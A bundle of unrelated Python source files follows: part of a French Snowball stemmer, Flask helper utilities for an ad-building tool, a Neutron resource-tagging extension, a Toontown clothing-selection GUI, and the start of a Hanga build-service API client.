self.cursor = self.limit - v_9
if not self.slice_from(u"iqU"):
return False
except lab12: pass
except lab11: pass
elif among_var == 9:
if not self.slice_from(u"eau"):
return False
elif among_var == 10:
if not self.__r_R1():
return False
if not self.slice_from(u"al"):
return False
elif among_var == 11:
try:
v_10 = self.limit - self.cursor
try:
if not self.__r_R2():
raise lab15()
if not self.slice_del():
return False
raise lab14()
except lab15: pass
self.cursor = self.limit - v_10
if not self.__r_R1():
return False
if not self.slice_from(u"eux"):
return False
except lab14: pass
elif among_var == 12:
if not self.__r_R1():
return False
if not self.out_grouping_b(FrenchStemmer.g_v, 97, 251):
return False
if not self.slice_del():
return False
elif among_var == 13:
if not self.__r_RV():
return False
if not self.slice_from(u"ant"):
return False
return False
elif among_var == 14:
if not self.__r_RV():
return False
if not self.slice_from(u"ent"):
return False
return False
else:
v_11 = self.limit - self.cursor
if not self.in_grouping_b(FrenchStemmer.g_v, 97, 251):
return False
if not self.__r_RV():
return False
self.cursor = self.limit - v_11
if not self.slice_del():
return False
return False
return True
def __r_i_verb_suffix(self):
if self.cursor < self.I_pV:
return False
v_2 = self.limit_backward
self.limit_backward = self.I_pV
self.ket = self.cursor
if self.find_among_b(FrenchStemmer.a_5) == 0:
self.limit_backward = v_2
return False
self.bra = self.cursor
v_3 = self.limit - self.cursor
try:
if not self.eq_s_b(u"H"):
raise lab0()
self.limit_backward = v_2
return False
except lab0: pass
self.cursor = self.limit - v_3
if not self.out_grouping_b(FrenchStemmer.g_v, 97, 251):
self.limit_backward = v_2
return False
if not self.slice_del():
return False
self.limit_backward = v_2
return True
def __r_verb_suffix(self):
if self.cursor < self.I_pV:
return False
v_2 = self.limit_backward
self.limit_backward = self.I_pV
self.ket = self.cursor
among_var = self.find_among_b(FrenchStemmer.a_6)
if among_var == 0:
self.limit_backward = v_2
return False
self.bra = self.cursor
if among_var == 1:
if not self.__r_R2():
self.limit_backward = v_2
return False
if not self.slice_del():
return False
elif among_var == 2:
if not self.slice_del():
return False
else:
if not self.slice_del():
return False
v_3 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"e"):
self.cursor = self.limit - v_3
raise lab0()
self.bra = self.cursor
if not self.slice_del():
return False
except lab0: pass
self.limit_backward = v_2
return True
def __r_residual_suffix(self):
v_1 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"s"):
self.cursor = self.limit - v_1
raise lab0()
self.bra = self.cursor
v_2 = self.limit - self.cursor
try:
v_3 = self.limit - self.cursor
try:
if not self.eq_s_b(u"Hi"):
raise lab2()
raise lab1()
except lab2: pass
self.cursor = self.limit - v_3
if not self.out_grouping_b(FrenchStemmer.g_keep_with_s, 97, 232):
self.cursor = self.limit - v_1
raise lab0()
except lab1: pass
self.cursor = self.limit - v_2
if not self.slice_del():
return False
except lab0: pass
if self.cursor < self.I_pV:
return False
v_5 = self.limit_backward
self.limit_backward = self.I_pV
self.ket = self.cursor
among_var = self.find_among_b(FrenchStemmer.a_7)
if among_var == 0:
self.limit_backward = v_5
return False
self.bra = self.cursor
if among_var == 1:
if not self.__r_R2():
self.limit_backward = v_5
return False
try:
v_6 = self.limit - self.cursor
try:
if not self.eq_s_b(u"s"):
raise lab4()
raise lab3()
except lab4: pass
self.cursor = self.limit - v_6
if not self.eq_s_b(u"t"):
self.limit_backward = v_5
return False
except lab3: pass
if not self.slice_del():
return False
elif among_var == 2:
if not self.slice_from(u"i"):
return False
else:
if not self.slice_del():
return False
self.limit_backward = v_5
return True
def __r_un_double(self):
v_1 = self.limit - self.cursor
if self.find_among_b(FrenchStemmer.a_8) == 0:
return False
self.cursor = self.limit - v_1
self.ket = self.cursor
if self.cursor <= self.limit_backward:
return False
self.cursor -= 1
self.bra = self.cursor
if not self.slice_del():
return False
return True
def __r_un_accent(self):
v_1 = 1
while True:
try:
if not self.out_grouping_b(FrenchStemmer.g_v, 97, 251):
raise lab0()
v_1 -= 1
continue
except lab0: pass
break
if v_1 > 0:
return False
self.ket = self.cursor
try:
v_3 = self.limit - self.cursor
try:
if not self.eq_s_b(u"\u00E9"):
raise lab2()
raise lab1()
except lab2: pass
self.cursor = self.limit - v_3
if not self.eq_s_b(u"\u00E8"):
return False
except lab1: pass
self.bra = self.cursor
if not self.slice_from(u"e"):
return False
return True
def _stem(self):
v_1 = self.cursor
self.__r_prelude()
self.cursor = v_1
self.__r_mark_regions()
self.limit_backward = self.cursor
self.cursor = self.limit
v_3 = self.limit - self.cursor
try:
try:
v_4 = self.limit - self.cursor
try:
v_5 = self.limit - self.cursor
try:
v_6 = self.limit - self.cursor
try:
if not self.__r_standard_suffix():
raise lab4()
raise lab3()
except lab4: pass
self.cursor = self.limit - v_6
try:
if not self.__r_i_verb_suffix():
raise lab5()
raise lab3()
except lab5: pass
self.cursor = self.limit - v_6
if not self.__r_verb_suffix():
raise lab2()
except lab3: pass
self.cursor = self.limit - v_5
v_7 = self.limit - self.cursor
try:
self.ket = self.cursor
try:
v_8 = self.limit - self.cursor
try:
if not self.eq_s_b(u"Y"):
raise lab8()
self.bra = self.cursor
if not self.slice_from(u"i"):
return False
raise lab7()
except lab8: pass
self.cursor = self.limit - v_8
if not self.eq_s_b(u"\u00E7"):
self.cursor = self.limit - v_7
raise lab6()
self.bra = self.cursor
if not self.slice_from(u"c"):
return False
except lab7: pass
except lab6: pass
raise lab1()
except lab2: pass
self.cursor = self.limit - v_4
if not self.__r_residual_suffix():
raise lab0()
except lab1: pass
except lab0: pass
self.cursor = self.limit - v_3
v_9 = self.limit - self.cursor
self.__r_un_double()
self.cursor = self.limit - v_9
v_10 = self.limit - self.cursor
self.__r_un_accent()
self.cursor = self.limit - v_10
self.cursor = self.limit_backward
v_11 = self.cursor
self.__r_postlude()
self.cursor = v_11
return True
class lab0(BaseException): pass
class lab1(BaseException): pass
class lab2(BaseException): pass
class lab3(BaseException): pass
class lab4(BaseException): pass
class lab5(BaseException): pass
class lab6(BaseException): pass
class lab7(BaseException): pass
class lab8(BaseException): pass
class lab9(BaseException): pass
class lab10(BaseException): pass
class lab11(BaseException): pass
class lab12(BaseException): pass
class lab13(BaseException): pass
class lab14(BaseException): pass
class lab15(BaseException): pass
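# Illustrative usage sketch (not part of the generated file): snowball
# stemmers are normally driven through a helper on ``BaseStemmer`` (assumed
# here to be ``stemWord``).
#
#     stemmer = FrenchStemmer()
#     stemmer.stemWord("continuellement")  # returns the stemmed form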
|
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Get builder form, depending on format."""
import os
import random
import time
import zipfile
from flask import request
from lib.adcase import db
from google.cloud import storage
def get_user_id(req):
"""get current user id.
Args:
req: flask request
Returns:
String user id
"""
h = req.values.get("hash")
user_id = db.res("SELECT user_id from sessions where enabled=1 and hash=%s",
(h))
if not user_id:
user_id = "57"
return user_id
def file_put_contents(file_name, content):
"""save content to file.
Args:
file_name: local file name
content: text content to save
"""
  # create the directory if it does not exist
try:
os.mkdir(os.path.dirname(file_name))
  except OSError:
pass
# write to file. create new or replace
fh = open(file_name, "w+")
fh.write(content)
fh.close()
def file_get_contents(filename):
"""Return the content of a file relative to current dir.
Args:
filename: url relative to current file
Returns:
File content as String. Empty string if file not found
"""
try:
txt = open(filename).read()
except OSError:
txt = ""
return txt
def create_zip(path, zip_filename):
"""save content to file.
Args:
path: directory to zip
zip_filename: full path to new created zip file.
Returns:
    True if the zip file was created, False if a BadZipFile error occurred
"""
try:
ziph = zipfile.ZipFile(zip_filename, "w", zipfile.ZIP_DEFLATED)
for root, _, files in os.walk(path):
for file2 in files:
ziph.write(
os.path.join(root, file2),
os.path.join(root, file2)[len(path):])
ziph.close()
return True
except zipfile.BadZipFile:
return False
def get_tmp_file_name():
"""get a random-ish number.
used to create temp folders.
Returns:
random string of numbers
"""
out = (
str(round(time.time() * 100000)) +
str(random.randint(10000000, 99999999)))
return out
def mk_dir(dir):
  """Create a directory, ignoring the error if it already exists.
  Args:
    dir: directory to create
  """
  try:
    os.mkdir(dir)
  except OSError:
    pass
def save_to_storage(file_name, destination_file):
"""Uploads file to cloud storage.
Args:
file_name: file to save
destination_file: location of new file in storage
Returns:
string with the downloadable storage url
"""
client = storage.Client()
bucket = client.get_bucket(os.environ.get("CLOUD_BUCKET_NAME"))
blob = bucket.blob(destination_file)
blob.upload_from_filename(file_name)
return "https://storage.googleapis.com/{}/{}".format(
os.environ.get("CLOUD_BUCKET_NAME"), destination_file
)
def save_file(file_to_save, location):
"""Saves a file to a specific location.
Args:
file_to_save: file to save
location: destination
"""
try:
os.mkdir(os.path.dirname(location))
  except OSError:
pass
file_to_save.save(location)
def extract_zip(zfile, dir2):
"""Extracts a zipfile into a new dir.
Args:
zfile: file to unzip
dir2: destination
Returns:
True or False if ok
"""
try:
delete(dir2)
os.mkdir(dir2)
zfile.save(dir2 + "-1.zip")
zip_ref = zipfile.ZipFile(dir2 + "-1.zip", "r")
zip_ref.extractall(dir2)
zip_ref.close()
os.remove(dir2 + "-1.zip")
return True
except zipfile.BadZipFile:
return False
def delete(top):
"""Deletes a subdir.
Args:
top: top level dir to delete
"""
for root, dirs, files in os.walk(top, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
if os.path.exists(top):
os.rmdir(top)
def clean_tmp(dir2):
"""Deletes temp files after a build process.
Args:
dir2: top level dir to delete
"""
delete(dir2)
try:
os.remove(dir2 + "-1.zip")
  except OSError:
pass
def get_int_param(n):
"""Returns payload, post or get parameter value as int.
Args:
n: parameter name
"""
return to_int(get_param(n))
def get_param(n):
"""Returns payload, post or get parameter value as String.
Args:
n: parameter name
"""
out = ""
try:
out = str(request.values[n])
except KeyError:
out = ""
return out
def to_int(s):
"""Converts safely to int.
On invalid output, returns 0.
Args:
s: String to convert
Returns:
int value or 0
"""
i = 0
try:
i = int(s)
except ValueError:
i = 0
except TypeError:
i = 0
return i
def get_ext(s):
"""Returns extension in lowercase.
Args:
s: Filename String
Returns:
extension of file name
"""
out = ""
try:
f = s.split(".")
out = f[len(f) - 1].lower()
except AttributeError:
out = ""
return out
def strtoken(st, pos, sep):
"""Splits string and returns splitted substring.
Returns "" if None.
Args:
st: String to split
pos: Position to return. Can be negative
sep: Separator
Returns:
    the selected substring, or "" if not found
"""
out = ""
s = st.split(sep)
if len(s) >= abs(pos) and pos != 0:
if pos > 0:
out = s[pos - 1]
else:
out = s[len(s) + pos]
return out
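# Illustrative usage sketch (not part of the original module):
#
#     strtoken("a/b/c", 2, "/")    # -> "b"
#     strtoken("a/b/c", -1, "/")   # -> "c"
#     strtoken("a/b/c", 9, "/")    # -> ""
#     to_int("42")                 # -> 42
#     to_int(None)                 # -> 0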
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from neutron_lib.api import extensions as api_extensions
from neutron_lib.api import faults
from neutron_lib.api import validators
from neutron_lib import exceptions
from neutron_lib.plugins import directory
from neutron_lib.services import base as service_base
import six
import webob.exc
from neutron._i18n import _
from neutron.api import extensions
from neutron.api.v2 import resource as api_resource
from neutron.common import rpc as n_rpc
from neutron.db import standard_attr
TAG = 'tag'
TAGS = TAG + 's'
MAX_TAG_LEN = 60
TAG_PLUGIN_TYPE = 'TAG'
# Exclude resources that are already supported by the legacy tag and tag-ext extensions
EXCEPTION_RESOURCES = ['networks', 'subnets', 'ports', 'subnetpools',
'routers']
# TODO(hichihara): Remove this method once the tag and tag-ext extensions
# have been removed.
def get_tagging_supported_resources():
    # Remove the resources already supported by tag and tag-ext
parent_map = standard_attr.get_tag_resource_parent_map()
remove_resources = [res for res in parent_map
if res in EXCEPTION_RESOURCES]
for resource in remove_resources:
del parent_map[resource]
return parent_map
TAG_SUPPORTED_RESOURCES = get_tagging_supported_resources()
TAG_ATTRIBUTE_MAP = {
TAGS: {'allow_post': False, 'allow_put': False, 'is_visible': True}
}
class TagResourceNotFound(exceptions.NotFound):
message = _("Resource %(resource)s %(resource_id)s could not be found.")
class TagNotFound(exceptions.NotFound):
message = _("Tag %(tag)s could not be found.")
def validate_tag(tag):
msg = validators.validate_string(tag, MAX_TAG_LEN)
if msg:
raise exceptions.InvalidInput(error_message=msg)
def validate_tags(body):
if 'tags' not in body:
raise exceptions.InvalidInput(error_message=_("Invalid tags body"))
msg = validators.validate_list_of_unique_strings(body['tags'], MAX_TAG_LEN)
if msg:
raise exceptions.InvalidInput(error_message=msg)
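# Illustrative usage sketch (not part of the original module): the body passed
# to ``update_all`` is validated with the helpers above.
#
#     validate_tag("production")                # ok, within MAX_TAG_LEN
#     validate_tags({"tags": ["red", "blue"]})  # ok, unique strings
#     validate_tags({"labels": ["red"]})        # raises InvalidInput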
def notify_tag_action(context, action, parent, parent_id, tags=None):
notifier = n_rpc.get_notifier('network')
tag_event = 'tag.%s' % action
# TODO(hichihara): Add 'updated_at' into payload
payload = {'parent_resource': parent,
'parent_resource_id': parent_id}
if tags is not None:
payload['tags'] = tags
notifier.info(context, tag_event, payload)
class TaggingController(object):
def __init__(self):
self.plugin = directory.get_plugin(TAG_PLUGIN_TYPE)
self.supported_resources = TAG_SUPPORTED_RESOURCES
def _get_parent_resource_and_id(self, kwargs):
for key in kwargs:
for resource in self.supported_resources:
if key == self.supported_resources[resource] + '_id':
return resource, kwargs[key]
return None, None
def index(self, request, **kwargs):
# GET /v2.0/networks/{network_id}/tags
parent, parent_id = self._get_parent_resource_and_id(kwargs)
return self.plugin.get_tags(request.context, parent, parent_id)
def show(self, request, id, **kwargs):
# GET /v2.0/networks/{network_id}/tags/{tag}
# id == tag
validate_tag(id)
parent, parent_id = self._get_parent_resource_and_id(kwargs)
return self.plugin.get_tag(request.context, parent, parent_id, id)
def create(self, request, **kwargs):
# not supported
# POST /v2.0/networks/{network_id}/tags
raise webob.exc.HTTPNotFound("not supported")
def update(self, request, id, **kwargs):
# PUT /v2.0/networks/{network_id}/tags/{tag}
# id == tag
validate_tag(id)
parent, parent_id = self._get_parent_resource_and_id(kwargs)
notify_tag_action(request.context, 'create.start',
parent, parent_id, [id])
result = self.plugin.update_tag(request.context, parent, parent_id, id)
notify_tag_action(request.context, 'create.end',
parent, parent_id, [id])
return result
def update_all(self, request, body, **kwargs):
# PUT /v2.0/networks/{network_id}/tags
# body: {"tags": ["aaa", "bbb"]}
validate_tags(body)
parent, parent_id = self._get_parent_resource_and_id(kwargs)
notify_tag_action(request.context, 'update.start',
parent, parent_id, body['tags'])
result = self.plugin.update_tags(request.context, parent,
parent_id, body)
notify_tag_action(request.context, 'update.end',
parent, parent_id, body['tags'])
return result
def delete(self, request, id, **kwargs):
# DELETE /v2.0/networks/{network_id}/tags/{tag}
# id == tag
validate_tag(id)
parent, parent_id = self._get_parent_resource_and_id(kwargs)
notify_tag_action(request.context, 'delete.start',
parent, parent_id, [id])
result = self.plugin.delete_tag(request.context, parent, parent_id, id)
notify_tag_action(request.context, 'delete.end',
parent, parent_id, [id])
return result
def delete_all(self, request, **kwargs):
# DELETE /v2.0/networks/{network_id}/tags
parent, parent_id = self._get_parent_resource_and_id(kwargs)
notify_tag_action(request.context, 'delete_all.start',
parent, parent_id)
result = self.plugin.delete_tags(request.context, parent, parent_id)
notify_tag_action(request.context, 'delete_all.end',
parent, parent_id)
return result
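# Illustrative route map (not part of the original module), summarizing the
# per-method comments above for a "networks" parent resource:
#
#     GET    /v2.0/networks/{network_id}/tags        -> index
#     GET    /v2.0/networks/{network_id}/tags/{tag}  -> show
#     PUT    /v2.0/networks/{network_id}/tags/{tag}  -> update (add one tag)
#     PUT    /v2.0/networks/{network_id}/tags        -> update_all (replace all)
#     DELETE /v2.0/networks/{network_id}/tags/{tag}  -> delete
#     DELETE /v2.0/networks/{network_id}/tags        -> delete_all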
class Tagging(api_extensions.ExtensionDescriptor):
"""Extension class supporting tags."""
@classmethod
def get_name(cls):
return ("Tag support for resources with standard attribute: %s"
% ', '.join(TAG_SUPPORTED_RESOURCES.values()))
@classmethod
def get_alias(cls):
return "standard-attr-tag"
@classmethod
def get_description(cls):
return "Enables to set tag on resources with standard attribute."
@classmethod
def get_updated(cls):
return "2017-01-01T00:00:00-00:00"
def get_required_extensions(self):
        # This is needed so that depending projects can easily move from the old
        # extensions, although this extension itself can run without them.
return ['tag', 'tag-ext']
@classmethod
def get_resources(cls):
"""Returns Ext Resources."""
exts = []
action_status = {'index': 200, 'show': 204, 'update': 201,
'update_all': 200, 'delete': 204, 'delete_all': 204}
controller = api_resource.Resource(TaggingController(),
faults.FAULT_MAP,
action_status=action_status)
collection_methods = {"delete_all": "DELETE",
"update_all": "PUT"}
exts = []
for collection_name, member_name in TAG_SUPPORTED_RESOURCES.items():
if 'security_group' in collection_name:
collection_name = collection_name.replace('_', '-')
parent = {'member_name': member_name,
'collection_name': collection_name}
exts.append(extensions.ResourceExtension(
TAGS, controller, parent,
collection_methods=collection_methods))
return exts
def get_extended_resources(self, version):
if version != "2.0":
return {}
EXTENDED_ATTRIBUTES_2_0 = {}
for collection_name in TAG_SUPPORTED_RESOURCES:
EXTENDED_ATTRIBUTES_2_0[collection_name] = TAG_ATTRIBUTE_MAP
return EXTENDED_ATTRIBUTES_2_0
@six.add_metaclass(abc.ABCMeta)
class TagPluginBase(service_base.ServicePluginBase):
"""REST API to operate the Tag."""
def get_plugin_description(self):
return "Tag support"
@classmethod
def get_plugin_type(cls):
return TAG_PLUGIN_TYPE
@abc.abstractmethod
def get_tags(self, context, resource, resource_id):
pass
@abc.abstractmethod
def get_tag(self, context, resource, resource_id, tag):
pass
@abc.abstractmethod
def update_tags(self, context, resource, resource_id, body):
pass
@abc.abstractmethod
def update_tag(self, context, resource, resource_id, tag):
pass
@abc.abstractmethod
def delete_tags(self, context, resource, resource_id):
pass
@abc.abstractmethod
def delete_tag(self, context, resource, resource_id, tag):
pass
|
|
# toontown.makeatoon.ClothesGUI
from toontown.toon import ToonDNA
from direct.fsm import StateData
from direct.gui.DirectGui import *
from MakeAToonGlobals import *
from toontown.toonbase import TTLocalizer
from direct.directnotify import DirectNotifyGlobal
import ShuffleButton
import random
CLOTHES_MAKETOON = 0
CLOTHES_TAILOR = 1
CLOTHES_CLOSET = 2
class ClothesGUI(StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('ClothesGUI')
def __init__(self, type, doneEvent, swapEvent = None):
StateData.StateData.__init__(self, doneEvent)
self.type = type
self.toon = None
self.swapEvent = swapEvent
self.gender = '?'
self.girlInShorts = 0
self.swappedTorso = 0
return
def load(self):
self.matGui = loader.loadModel('phase_3/models/gui/tt_m_gui_mat_mainGui')
guiRArrowUp = self.matGui.find('**/tt_t_gui_mat_arrowUp')
guiRArrowRollover = self.matGui.find('**/tt_t_gui_mat_arrowUp')
guiRArrowDown = self.matGui.find('**/tt_t_gui_mat_arrowDown')
guiRArrowDisabled = self.matGui.find('**/tt_t_gui_mat_arrowDisabled')
self.shuffleFrame = self.matGui.find('**/tt_t_gui_mat_shuffleFrame')
shuffleArrowUp = self.matGui.find('**/tt_t_gui_mat_shuffleArrowUp')
shuffleArrowDown = self.matGui.find('**/tt_t_gui_mat_shuffleArrowDown')
shuffleArrowRollover = self.matGui.find('**/tt_t_gui_mat_shuffleArrowUp')
shuffleArrowDisabled = self.matGui.find('**/tt_t_gui_mat_shuffleArrowDisabled')
self.parentFrame = DirectFrame(relief=DGG.RAISED, pos=(0.98, 0, 0.416), frameColor=(1, 0, 0, 0))
self.parentFrame.setPos(-0.36, 0, -0.5)
self.parentFrame.reparentTo(base.a2dTopRight)
self.shirtFrame = DirectFrame(parent=self.parentFrame, image=self.shuffleFrame, image_scale=halfButtonInvertScale, relief=None, pos=(0, 0, -0.4), hpr=(0, 0, 3), scale=1.2, frameColor=(1, 1, 1, 1), text=TTLocalizer.ClothesShopShirt, text_scale=0.0575, text_pos=(-0.001, -0.015), text_fg=(1, 1, 1, 1))
self.topLButton = DirectButton(parent=self.shirtFrame, relief=None, image=(shuffleArrowUp,
shuffleArrowDown,
shuffleArrowRollover,
shuffleArrowDisabled), image_scale=halfButtonScale, image1_scale=halfButtonHoverScale, image2_scale=halfButtonHoverScale, pos=(-0.2, 0, 0), command=self.swapTop, extraArgs=[-1])
self.topRButton = DirectButton(parent=self.shirtFrame, relief=None, image=(shuffleArrowUp,
shuffleArrowDown,
shuffleArrowRollover,
shuffleArrowDisabled), image_scale=halfButtonInvertScale, image1_scale=halfButtonInvertHoverScale, image2_scale=halfButtonInvertHoverScale, pos=(0.2, 0, 0), command=self.swapTop, extraArgs=[1])
self.bottomFrame = DirectFrame(parent=self.parentFrame, image=self.shuffleFrame, image_scale=halfButtonInvertScale, relief=None, pos=(0, 0, -0.65), hpr=(0, 0, -2), scale=1.2, frameColor=(1, 1, 1, 1), text=TTLocalizer.ColorShopToon, text_scale=0.0575, text_pos=(-0.001, -0.015), text_fg=(1, 1, 1, 1))
self.bottomLButton = DirectButton(parent=self.bottomFrame, relief=None, image=(shuffleArrowUp,
shuffleArrowDown,
shuffleArrowRollover,
shuffleArrowDisabled), image_scale=halfButtonScale, image1_scale=halfButtonHoverScale, image2_scale=halfButtonHoverScale, pos=(-0.2, 0, 0), command=self.swapBottom, extraArgs=[-1])
self.bottomRButton = DirectButton(parent=self.bottomFrame, relief=None, image=(shuffleArrowUp,
shuffleArrowDown,
shuffleArrowRollover,
shuffleArrowDisabled), image_scale=halfButtonInvertScale, image1_scale=halfButtonInvertHoverScale, image2_scale=halfButtonInvertHoverScale, pos=(0.2, 0, 0), command=self.swapBottom, extraArgs=[1])
self.parentFrame.hide()
self.shuffleFetchMsg = 'ClothesShopShuffle'
self.shuffleButton = ShuffleButton.ShuffleButton(self, self.shuffleFetchMsg)
return
def unload(self):
self.matGui.removeNode()
del self.matGui
self.parentFrame.destroy()
self.shirtFrame.destroy()
self.bottomFrame.destroy()
self.topLButton.destroy()
self.topRButton.destroy()
self.bottomLButton.destroy()
self.bottomRButton.destroy()
del self.shuffleFrame
del self.parentFrame
del self.shirtFrame
del self.bottomFrame
del self.topLButton
del self.topRButton
del self.bottomLButton
del self.bottomRButton
self.shuffleButton.unload()
self.ignore('MAT-newToonCreated')
def showButtons(self):
self.parentFrame.show()
def hideButtons(self):
self.parentFrame.hide()
def enter(self, toon):
self.notify.debug('enter')
base.disableMouse()
self.toon = toon
self.setupScrollInterface()
if not self.type == CLOTHES_TAILOR:
currTop = (self.toon.style.topTex,
self.toon.style.topTexColor,
self.toon.style.sleeveTex,
self.toon.style.sleeveTexColor)
currTopIndex = self.tops.index(currTop)
self.swapTop(currTopIndex - self.topChoice)
currBottom = (self.toon.style.botTex, self.toon.style.botTexColor)
currBottomIndex = self.bottoms.index(currBottom)
self.swapBottom(currBottomIndex - self.bottomChoice)
choicePool = [self.tops, self.bottoms]
self.shuffleButton.setChoicePool(choicePool)
self.accept(self.shuffleFetchMsg, self.changeClothes)
self.acceptOnce('MAT-newToonCreated', self.shuffleButton.cleanHistory)
def exit(self):
try:
del self.toon
        except AttributeError:
self.notify.warning('ClothesGUI: toon not found')
self.hideButtons()
self.ignore('enter')
self.ignore('next')
self.ignore('last')
self.ignore(self.shuffleFetchMsg)
def setupButtons(self):
self.girlInShorts = 0
if self.gender == 'f':
if self.bottomChoice == -1:
botTex = self.bottoms[0][0]
else:
botTex = self.bottoms[self.bottomChoice][0]
if ToonDNA.GirlBottoms[botTex][1] == ToonDNA.SHORTS:
self.girlInShorts = 1
if self.toon.style.getGender() == 'm':
self.bottomFrame['text'] = TTLocalizer.ClothesShopShorts
else:
self.bottomFrame['text'] = TTLocalizer.ClothesShopBottoms
self.acceptOnce('last', self.__handleBackward)
self.acceptOnce('next', self.__handleForward)
return None
def swapTop(self, offset):
length = len(self.tops)
self.topChoice += offset
if self.topChoice <= 0:
self.topChoice = 0
self.updateScrollButtons(self.topChoice, length, 0, self.topLButton, self.topRButton)
if self.topChoice < 0 or self.topChoice >= len(self.tops) or len(self.tops[self.topChoice]) != 4:
self.notify.warning('topChoice index is out of range!')
return
else:
self.toon.style.topTex = self.tops[self.topChoice][0]
self.toon.style.topTexColor = self.tops[self.topChoice][1]
self.toon.style.sleeveTex = self.tops[self.topChoice][2]
self.toon.style.sleeveTexColor = self.tops[self.topChoice][3]
self.toon.generateToonClothes()
if self.swapEvent != None:
messenger.send(self.swapEvent)
messenger.send('wakeup')
return
def swapBottom(self, offset):
length = len(self.bottoms)
self.bottomChoice += offset
if self.bottomChoice <= 0:
self.bottomChoice = 0
self.updateScrollButtons(self.bottomChoice, length, 0, self.bottomLButton, self.bottomRButton)
if self.bottomChoice < 0 or self.bottomChoice >= len(self.bottoms) or len(self.bottoms[self.bottomChoice]) != 2:
self.notify.warning('bottomChoice index is out of range!')
return
else:
self.toon.style.botTex = self.bottoms[self.bottomChoice][0]
self.toon.style.botTexColor = self.bottoms[self.bottomChoice][1]
if self.toon.generateToonClothes() == 1:
self.toon.loop('neutral', 0)
self.swappedTorso = 1
if self.swapEvent != None:
messenger.send(self.swapEvent)
messenger.send('wakeup')
return
def updateScrollButtons(self, choice, length, startTex, lButton, rButton):
if choice >= length - 1:
rButton['state'] = DGG.DISABLED
else:
rButton['state'] = DGG.NORMAL
if choice <= 0:
lButton['state'] = DGG.DISABLED
else:
lButton['state'] = DGG.NORMAL
def __handleForward(self):
self.doneStatus = 'next'
messenger.send(self.doneEvent)
def __handleBackward(self):
self.doneStatus = 'last'
messenger.send(self.doneEvent)
def resetClothes(self, style):
if self.toon:
self.toon.style.makeFromNetString(style.makeNetString())
if self.swapEvent != None and self.swappedTorso == 1:
self.toon.swapToonTorso(self.toon.style.torso, genClothes=0)
self.toon.generateToonClothes()
self.toon.loop('neutral', 0)
return
def changeClothes(self):
self.notify.debug('Entering changeClothes')
newChoice = self.shuffleButton.getCurrChoice()
if newChoice[0] in self.tops:
newTopIndex = self.tops.index(newChoice[0])
else:
newTopIndex = self.topChoice
if newChoice[1] in self.bottoms:
newBottomIndex = self.bottoms.index(newChoice[1])
else:
newBottomIndex = self.bottomChoice
oldTopIndex = self.topChoice
oldBottomIndex = self.bottomChoice
self.swapTop(newTopIndex - oldTopIndex)
self.swapBottom(newBottomIndex - oldBottomIndex)
def getCurrToonSetting(self):
return [self.tops[self.topChoice], self.bottoms[self.bottomChoice]]
|
|
import requests
from hanga.utils import TrackedFile
from hanga import appdirs
from json import dumps
from os import environ, makedirs
from os.path import join, exists
try:
from configparser import ConfigParser
except ImportError:
from ConfigParser import ConfigParser
class HangaException(Exception):
pass
class HangaAPI(object):
"""API to communicate with Hanga"""
def __init__(self, key=None, url=None):
super(HangaAPI, self).__init__()
self.read_configuration()
c = self.config
# possible url location (in order of importance)
urls = (url,
environ.get("HANGA_URL"),
c.get("auth", "url") if
c.has_option("auth", "url") else None,
"https://hanga.io")
# possible keys location (in order of importance)
keys = (key,
environ.get("HANGA_API_KEY"),
c.get("auth", "apikey") if
c.has_option("auth", "apikey") else None)
self._url = next((x for x in urls if x))
self._key = next((x for x in keys if x), None)
def submit(self, args, filename, callback=None):
"""Submit a packaged app to build. Filename should point on a
structured zip containing the app, buildozer.spec adjusted for it,
and others deps if needed. Args should be the line used for building
the app.
The result is a dict that contain::
{
"result": "ok",
"uuid": "f18cafae-c730-11e3-add4-04011676f501",
}
Or if there is a failure::
{
"result": "error",
"details": "Something bad happened"
}
"""
self.ensure_configuration()
fd = None
try:
fd = TrackedFile(filename, callback=callback)
params = {"args": dumps(args)}
r = self._build_request(
requests.post, "submit", data=fd, params=params, stream=True)
finally:
if fd:
fd.close()
return r.json()
def download(self, uuid, dest_dir, callback=None):
"""Download the result of a job build. If a callback is passed, it will
be called with the size of the content received and the total size of
the content.
        Return the name of the file created in dest_dir.
"""
self.ensure_configuration()
r = self._build_request(requests.get,
"{}/dl".format(uuid), stream=True)
# ensure the name is shared in the content-disposition
disposition = r.headers.get("content-disposition")
if not disposition or not disposition.startswith("attachment;"):
raise HangaException("File not attached, nothing to download")
filename = disposition.split("filename=", 1)[-1]
if not filename:
raise HangaException("Empty filename")
dest_fn = join(dest_dir, filename)
index = 0
length = int(r.headers.get("Content-Length"))
if callback:
callback(0, length)
with open(dest_fn, "wb") as fd:
for content in r.iter_content(chunk_size=8192):
fd.write(content)
index += len(content)
if callback:
callback(index, length)
return filename
def status(self, uuid):
"""Return the status of a job, in a form of a dictionary::
{
"result": "ok",
"job_status": "packaging",
"job_progression": "78"
}
The `result` can be either "OK" or "error" if something happens.
The `job_status` can be a lot of things, depending on the Hanga
version running. It ends only with a status of "done" or "error".
"""
self.ensure_configuration()
r = self._build_request(requests.get, "{}/status".format(uuid))
return r.json()
def importkey(self, platform, name, **infos):
"""Import a key to Hanga. Then you can associate the key to your app.
`platform` is one of the supported platform in Hanga. Currently, only
"android" is considered as valid.
Depending of the platform, you will have multiples informations to
pass.
For android, you'll need `keystore`, `keystore_password`, `alias`,
`alias_password`.
The result is a dict that contain::
{
"result": "ok",
}
Or if there is a failure::
{
"result": "error",
"details": "Something bad happened"
}
"""
assert(platform == "android")
assert(name)
if platform == "android":
assert(infos.get("keystore"))
